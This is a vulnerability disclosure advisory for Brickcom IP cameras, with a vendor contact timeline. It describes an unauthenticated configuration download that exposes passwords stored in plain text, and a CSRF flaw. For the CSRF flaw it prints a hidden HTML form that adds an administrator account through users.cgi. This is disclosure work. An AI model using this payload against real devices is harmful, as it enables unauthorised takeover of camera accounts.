The information has been provided by Eliezer Varad Lopez, Javier Repiso S nchez and Jon s Ropero Castillo.
Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689, These allows you to download the all the configuration device file writing the next URL (all data shown will be in plain text). It s not necessary any authentication.
The most interesting parameters could be:
UserSetSetting.userList.users[n ].password= ***
UserSetSetting.userList.users[n ].name= ***
Cross Site Request Forgerty (CSRF) + Privilege Escalation
CVE-2013-3690, CSRF is possible via POST method. Also is possible a privilege escalation from a viewer user to an administrator user. These cameras use a web interface which is prone to CSRF vulnerabilities. A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.The following request can exploit this vulnerability
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
-2013-05-31: Students team notifies the Brickcom Customer Support of the vulnerabilities.
-2013-05-31: Brickcom answers saying this in accordance with some of the vulnerabilities, but there are some that they think is not correct.
(CVE-2013-3689, Authentication bypass and plain text information: After talk with vendor, it s looks that after firmware 3.1.x.x, this bug is fixed but still the information is shown in plain text, so they should fix this second one)
-2013-06-03: Students check and communicate Brickcom the detail products and firmwares affected by vulnerabilities.
-2013-06-04: The vendor is agree with everything stated and reports that will fix it as soon as possible.